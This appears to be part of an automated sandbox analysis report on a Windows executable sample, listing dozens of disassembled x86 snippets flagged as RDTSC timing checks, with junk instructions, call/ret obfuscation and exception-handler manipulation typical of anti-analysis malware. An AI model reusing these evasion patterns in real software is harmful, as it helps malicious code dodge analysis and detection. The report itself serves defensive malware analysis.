Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 23F57C second address: 23F602 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 nop 0x00000007 mov bx, 6100h 0x0000000b push dword ptr fs:[00000000h] 0x00000012 mov dword ptr [ebp+124454FAh], edx 0x00000018 mov dword ptr fs:[00000000h], esp 0x0000001f push 00000000h 0x00000021 push edx 0x00000022 call 00007F6035561AD8h 0x00000027 pop edx 0x00000028 mov dword ptr [esp+04h], edx 0x0000002c add dword ptr [esp+04h], 00000017h 0x00000034 inc edx 0x00000035 push edx 0x00000036 ret 0x00000037 pop edx 0x00000038 ret 0x00000039 jno 00007F6035561ADBh 0x0000003f mov eax, dword ptr [ebp+122D08A1h] 0x00000045 jmp 00007F6035561ADDh 0x0000004a push FFFFFFFFh 0x0000004c push 00000000h 0x0000004e push eax 0x0000004f call 00007F6035561AD8h 0x00000054 pop eax 0x00000055 mov dword ptr [esp+04h], eax 0x00000059 add dword ptr [esp+04h], 00000019h 0x00000061 inc eax 0x00000062 push eax 0x00000063 ret 0x00000064 pop eax 0x00000065 ret 0x00000066 mov edi, edx 0x00000068 nop 0x00000069 push edx 0x0000006a pushad 0x0000006b push eax 0x0000006c push edx 0x0000006d rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 244457 second address: 2444E5 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F6034D241CCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d mov bx, 8008h 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push ebx 0x00000016 call 00007F6034D241C8h 0x0000001b pop ebx 0x0000001c mov dword ptr [esp+04h], ebx 0x00000020 add dword ptr [esp+04h], 0000001Ah 0x00000028 inc ebx 0x00000029 push ebx 0x0000002a ret 0x0000002b pop ebx 0x0000002c ret 0x0000002d or dword ptr [ebp+12446E96h], ecx 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push ebp 0x00000038 call 00007F6034D241C8h 0x0000003d pop ebp 0x0000003e mov dword ptr [esp+04h], ebp 0x00000042 add dword ptr [esp+04h], 0000001Dh 0x0000004a inc ebp 0x0000004b push ebp 0x0000004c ret 0x0000004d pop ebp 0x0000004e ret 0x0000004f mov edi, dword ptr [ebp+122D27FEh] 0x00000055 or dword ptr [ebp+12471E9Fh], eax 0x0000005b push eax 0x0000005c pushad 0x0000005d push ebx 0x0000005e jmp 00007F6034D241D2h 0x00000063 pop ebx 0x00000064 push eax 0x00000065 push edx 0x00000066 pushad 0x00000067 popad 0x00000068 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 24273B second address: 24273F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 24273F second address: 242760 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F6034D241D5h 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 243635 second address: 243639 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 2453B4 second address: 2453C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6034D241CDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 2445FE second address: 244604 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 244604 second address: 244608 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 244608 second address: 24460C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 24470E second address: 244730 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F6034D241D8h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 247BB2 second address: 247C16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jg 00007F6035561AD6h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007F6035561AE6h 0x00000012 nop 0x00000013 sub bh, 00000013h 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push eax 0x0000001b call 00007F6035561AD8h 0x00000020 pop eax 0x00000021 mov dword ptr [esp+04h], eax 0x00000025 add dword ptr [esp+04h], 00000017h 0x0000002d inc eax 0x0000002e push eax 0x0000002f ret 0x00000030 pop eax 0x00000031 ret 0x00000032 mov bl, ch 0x00000034 push 00000000h 0x00000036 mov dword ptr [ebp+122D23ACh], ecx 0x0000003c xchg eax, esi 0x0000003d push eax 0x0000003e push edx 0x0000003f push edi 0x00000040 jmp 00007F6035561ADDh 0x00000045 pop edi 0x00000046 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 247DD0 second address: 247DE3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jc 00007F6034D241C6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 247DE3 second address: 247DED instructions: 0x00000000 rdtsc 0x00000002 jg 00007F6035561AD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 247DED second address: 247DF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F6034D241C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 247DF7 second address: 247E61 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 add edi, 284F7F66h 0x0000000f push dword ptr fs:[00000000h] 0x00000016 mov dword ptr [ebp+122D2E5Ah], edx 0x0000001c mov dword ptr fs:[00000000h], esp 0x00000023 jmp 00007F6035561AE1h 0x00000028 mov eax, dword ptr [ebp+122D0719h] 0x0000002e mov dword ptr [ebp+122D2426h], ebx 0x00000034 push FFFFFFFFh 0x00000036 push 00000000h 0x00000038 push ebx 0x00000039 call 00007F6035561AD8h 0x0000003e pop ebx 0x0000003f mov dword ptr [esp+04h], ebx 0x00000043 add dword ptr [esp+04h], 0000001Ah 0x0000004b inc ebx 0x0000004c push ebx 0x0000004d ret 0x0000004e pop ebx 0x0000004f ret 0x00000050 nop 0x00000051 pushad 0x00000052 push eax 0x00000053 push edx 0x00000054 push ecx 0x00000055 pop ecx 0x00000056 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 247E61 second address: 247E65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 250F58 second address: 250F65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 js 00007F6035561ADCh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 257A6A second address: 257A6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 257A6E second address: 257A74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 257B5F second address: 257BBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F6034D241C6h 0x0000000a popad 0x0000000b popad 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 pushad 0x00000011 push edx 0x00000012 jmp 00007F6034D241D1h 0x00000017 pop edx 0x00000018 js 00007F6034D241C8h 0x0000001e push eax 0x0000001f pop eax 0x00000020 popad 0x00000021 mov eax, dword ptr [eax] 0x00000023 pushad 0x00000024 jnc 00007F6034D241D4h 0x0000002a jmp 00007F6034D241CEh 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F6034D241D6h 0x00000036 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 257DE7 second address: 257DEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 257DEB second address: 257DF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 25BA75 second address: 25BA7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F6035561AD6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 25BA7F second address: 25BA83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 25BA83 second address: 25BA9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F6035561AE1h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 25BA9C second address: 25BAB7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F6034D241C6h 0x00000009 jmp 00007F6034D241CEh 0x0000000e popad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 25C1F0 second address: 25C1FA instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F6035561AD6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 25C1FA second address: 25C209 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 25C209 second address: 25C20F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 25C20F second address: 25C213 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 25C388 second address: 25C3B5 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F6035561AD6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push edi 0x0000000e pop edi 0x0000000f je 00007F6035561AD6h 0x00000015 jmp 00007F6035561AE6h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 25C3B5 second address: 25C3BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 25C4F0 second address: 25C4F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 263BDD second address: 263BE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 263D25 second address: 263D52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007F6035561AE1h 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F6035561AE0h 0x00000012 push eax 0x00000013 pushad 0x00000014 popad 0x00000015 pop eax 0x00000016 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 263D52 second address: 263D58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 264324 second address: 264335 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F6035561AD6h 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d pop eax 0x0000000e push edx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 2644CA second address: 2644ED instructions: 0x00000000 rdtsc 0x00000002 jl 00007F6034D241E5h 0x00000008 jmp 00007F6034D241D9h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 2644ED second address: 2644FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jnl 00007F6035561AD6h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 264A2D second address: 264A37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push edx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 264A37 second address: 264A3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 264E75 second address: 264E79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 264E79 second address: 264E97 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F6035561AD6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F6035561ADCh 0x00000011 push eax 0x00000012 push edx 0x00000013 push edi 0x00000014 pop edi 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 264E97 second address: 264EB7 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F6034D241C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F6034D241D2h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 264EB7 second address: 264EBD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 269420 second address: 269454 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F6034D241C6h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c popad 0x0000000d jmp 00007F6034D241CDh 0x00000012 pop esi 0x00000013 push edi 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F6034D241D6h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 269454 second address: 26945A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 269596 second address: 2695A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnp 00007F6034D241C6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 2695A5 second address: 2695C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F6035561AD6h 0x0000000a popad 0x0000000b jmp 00007F6035561AE1h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 2695C5 second address: 2695D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6034D241CDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 2695D6 second address: 2695DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 269724 second address: 26972C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 26972C second address: 269736 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F6035561AD6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 269736 second address: 26974E instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F6034D241C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnl 00007F6034D241C6h 0x00000012 jne 00007F6034D241C6h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 26974E second address: 269752 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 269102 second address: 269120 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6034D241D8h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 269120 second address: 26914C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F6035561AE5h 0x0000000a pushad 0x0000000b jmp 00007F6035561ADFh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 26A07E second address: 26A095 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6034D241D3h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 26A095 second address: 26A0AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6035561AE5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 26A0AE second address: 26A0D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6034D241D0h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F6034D241D7h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 26EACA second address: 26EAF1 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F6035561AD6h 0x00000008 jmp 00007F6035561AE9h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 26EAF1 second address: 26EB02 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6034D241CDh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 1F0089 second address: 1F009B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6035561ADCh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 1F009B second address: 1F00C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6034D241D4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F6034D241CDh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 26D934 second address: 26D95D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 jmp 00007F6035561ADFh 0x0000000c jg 00007F6035561AD8h 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 pushad 0x00000016 push esi 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 pop esi 0x0000001a push ebx 0x0000001b pushad 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 26D95D second address: 26D971 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 jns 00007F6034D241C6h 0x0000000c jc 00007F6034D241C6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 22C948 second address: 22C951 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 22C951 second address: 22C962 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 22C962 second address: 22C9B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 js 00007F6035561AD6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e nop 0x0000000f mov edi, 75078900h 0x00000014 lea eax, dword ptr [ebp+124786E8h] 0x0000001a push 00000000h 0x0000001c push edi 0x0000001d call 00007F6035561AD8h 0x00000022 pop edi 0x00000023 mov dword ptr [esp+04h], edi 0x00000027 add dword ptr [esp+04h], 00000019h 0x0000002f inc edi 0x00000030 push edi 0x00000031 ret 0x00000032 pop edi 0x00000033 ret 0x00000034 nop 0x00000035 jl 00007F6035561ADEh 0x0000003b jbe 00007F6035561AD8h 0x00000041 pushad 0x00000042 popad 0x00000043 push eax 0x00000044 push eax 0x00000045 push edx 0x00000046 push eax 0x00000047 push edx 0x00000048 push eax 0x00000049 push edx 0x0000004a rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 22C9B3 second address: 22C9B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 22C9B7 second address: 22C9C1 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F6035561AD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 22C9C1 second address: 210B94 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push ebp 0x0000000c call 00007F6034D241C8h 0x00000011 pop ebp 0x00000012 mov dword ptr [esp+04h], ebp 0x00000016 add dword ptr [esp+04h], 00000019h 0x0000001e inc ebp 0x0000001f push ebp 0x00000020 ret 0x00000021 pop ebp 0x00000022 ret 0x00000023 jno 00007F6034D241CBh 0x00000029 add cx, 2937h 0x0000002e call dword ptr [ebp+122D1CA7h] 0x00000034 je 00007F6034D241D8h 0x0000003a push eax 0x0000003b push edx 0x0000003c ja 00007F6034D241C6h 0x00000042 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 22CF44 second address: 22CF62 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F6035561AD8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xor dword ptr [esp], 2F94E34Eh 0x00000013 mov dl, 2Fh 0x00000015 push 7DB18C4Fh 0x0000001a push ecx 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 22D158 second address: 22D15D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 22D1F7 second address: 22D1FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 22D1FD second address: 22D206 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 22D206 second address: 22D20A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 22D75B second address: 22D788 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F6034D241C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b nop 0x0000000c push 0000001Eh 0x0000000e mov cl, 84h 0x00000010 mov ch, D8h 0x00000012 nop 0x00000013 jmp 00007F6034D241D4h 0x00000018 push eax 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
